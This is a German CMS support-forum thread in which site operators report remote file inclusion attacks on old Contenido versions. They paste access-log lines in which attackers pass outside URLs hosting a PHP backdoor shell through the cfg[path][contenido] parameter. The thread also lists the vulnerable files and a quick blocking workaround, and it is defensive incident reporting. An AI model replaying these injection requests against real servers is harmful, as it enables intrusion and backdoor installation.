Folgende oder ähnliche einträge finden sich einige in den Logs eins gehackten Kunden Account. Das Script was hier eingebunden wird ist ein bekanntes backdoor php shell.
Bitte um Aufklärung über dieses Problem. Die Contenido Version "in question" ist 4.6.4.
Handelt es sich hier bei um etwas beaknntes oder ist das neu?
Dankeschön.
69.93.188.250 - - [11/May/2007:17:34:24 +0200] "GET /cms//contenido/conlib/local.php?cfg[path][contenido]=http://www.chrisvalk.com/1/headstones/h?? HTTP/1.1" 404 1578 "-" "libwww-perl/5.805"
Exploit für Contenido im umlauf?
soweit ich weiß, ist das wieder dasselbe. Du solltest dringend auf das aktuelle 4.6.15 updaten, die älteren 4.6.* waren etwas buggy und unsicher. Nähere Informationen findest du aber hier im Forum.
"Es wird keine Handlung geben, keine Geschichte mit ihrer Versprechung auf einen Anfang und ihrer Hoffnung auf ein Ende." (Andrzej Stasiuk)
-
stefan25376
- Beiträge: 40
- Registriert: Mi 15. Jun 2005, 09:40
- Wohnort: Schwerte
- Kontaktdaten:
4 Exploits bisher bei alter Version
Hallo tty7,
Auf einem meiner Server läuft ein altes Contenido 4.4.5. Irgendwelche Script-Kiddies sind da auch immer schwer zugange. Mit folgenden Dateien sind bei mir bisher Code-Injections probiert worden:
Das ist in diesem Forum schon einmal in einem früheren Post erläutert worden. Hier noch einmal ein Workaround "quick and dirty":
In die ersten Zeilen der Dateien einfach folgende Zeilen einfügen:
Auf einem meiner Server läuft ein altes Contenido 4.4.5. Irgendwelche Script-Kiddies sind da auch immer schwer zugange. Mit folgenden Dateien sind bei mir bisher Code-Injections probiert worden:
Code: Alles auswählen
/conlib/local.php
/contenido/classes/class.inuse.php
/contenido/classes/class.htmlelements.php
/contenido/includes/include.logs.phpIn die ersten Zeilen der Dateien einfach folgende Zeilen einfügen:
Code: Alles auswählen
if ($_GET["cfg"] || $_POST["cfg"])
{
die();
}Folgender exploit scheint für 4.6.4 valide zu sein:
88.198.175.78 - - [18/May/2007:15:36:42 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 13032 "-" "Mozilla 8.0"
216.224.124.124 - - [18/May/2007:15:51:58 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.0" 200 16654 "-" "Mozilla 8.0"
64.251.15.140 - - [18/May/2007:15:55:37 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 35114 "-" "Mozilla 8.0"
88.191.51.214 - - [18/May/2007:16:46:23 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 13032 "-" "Mozilla 8.0"
installiert wird von den Jungs ein iroffer bot mit haufenweise italenischen Filmen. Gleich mal ein paar abuse mail loswerden und dann beobachten. Contenido ist jetzt up to date, mal sehn ob noch was passiert.
88.198.175.78 - - [18/May/2007:15:36:42 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 13032 "-" "Mozilla 8.0"
216.224.124.124 - - [18/May/2007:15:51:58 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.0" 200 16654 "-" "Mozilla 8.0"
64.251.15.140 - - [18/May/2007:15:55:37 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 35114 "-" "Mozilla 8.0"
88.191.51.214 - - [18/May/2007:16:46:23 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 13032 "-" "Mozilla 8.0"
installiert wird von den Jungs ein iroffer bot mit haufenweise italenischen Filmen. Gleich mal ein paar abuse mail loswerden und dann beobachten. Contenido ist jetzt up to date, mal sehn ob noch was passiert.
-
wosch
Da wird versucht auf eine gleiche Methode zu installieren:
http://www.contenido.de/forum/viewtopic.php?p=101192
Das Script bei dir ist uralt (und nur mässig programmiert), von Ende 2005 / Anfang 2006
Du solltst aber auch deine eigene Inhalte gründlich prüfen,
das Script kann auch "Hintertürchen öffnen" und weitere Scripte auf deinem Webspace für ein BotNet installieren.
Auch deinen Provider solltest du informieren das er seinen Server gründlich checkt auf "ungebetene Gäste".
Ein Update auf 4.6.8.15 wäre in dem Zusammenhang dringend anzuraten.
http://www.contenido.de/forum/viewtopic.php?p=101192
Das Script bei dir ist uralt (und nur mässig programmiert), von Ende 2005 / Anfang 2006
Du solltst aber auch deine eigene Inhalte gründlich prüfen,
das Script kann auch "Hintertürchen öffnen" und weitere Scripte auf deinem Webspace für ein BotNet installieren.
Auch deinen Provider solltest du informieren das er seinen Server gründlich checkt auf "ungebetene Gäste".
Ein Update auf 4.6.8.15 wäre in dem Zusammenhang dringend anzuraten.
-
Dodger77
- Beiträge: 3626
- Registriert: Di 12. Okt 2004, 20:00
- Wohnort: Voerde (Niederrhein)
- Kontaktdaten:
Nein, nur für die 4.4.x; die Datei "news.php" ist in der 4.6.x nicht mehr drin. Das kann evtl. ein Überbleibsel von einem Update sein.tty7 hat geschrieben:Folgender exploit scheint für 4.6.4 valide zu sein:
88.198.175.78 - - [18/May/2007:15:36:42 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 13032 "-" "Mozilla 8.0"
-
wosch
Dodger77,
nur so unausgegoren (ohne endgültige Konsequenz) mal überlegt.
Bei einem Update von 4.4.x auf 4.6.x hätte ja die news.php keinen praktischen Wert mehr.
Wäre es nicht sinnvoll solche "alten" und nicht mehr benötigten Dateien zu "entschärfen" (wie auch immer)?
Was macht ein Update aus Sicherheitsgründen einen Sinn wenn noch Reste der alten Dateien im System bleiben und weiterhin "angreifbar" sind.
nur so unausgegoren (ohne endgültige Konsequenz) mal überlegt.
Bei einem Update von 4.4.x auf 4.6.x hätte ja die news.php keinen praktischen Wert mehr.
Wäre es nicht sinnvoll solche "alten" und nicht mehr benötigten Dateien zu "entschärfen" (wie auch immer)?
Was macht ein Update aus Sicherheitsgründen einen Sinn wenn noch Reste der alten Dateien im System bleiben und weiterhin "angreifbar" sind.
Oh so ist das file eifnach beim update übrig geblieben? Auch nett, den wenn man sich die Logs der Angriffe anschaut scannen die Kids anscheind nach solchen fällen. Es werden diverse files probiert, wären sie nur auf die alten aus würde so ein vorgehen ja kaum sinn machen. Hier sollte man sich vieleciht mal was überlegen. Letzenendes kann man aktuell sein und trotzdem verwundbar durch solche alten Tretmienen.
Es ist praktisch unmöglich, alle weggefallenen Dazeien zu tracken und für den Fall der Fälle als leere Dateien mitzuschleifen.
Hinweis in der readme.txt zum Update ergänzt.
Closed.
Gruß
HerrB
Hinweis in der readme.txt zum Update ergänzt.
Closed.
Gruß
HerrB
Bitte keine unaufgeforderten PMs oder E-Mails -> use da Forum!
Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net
Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net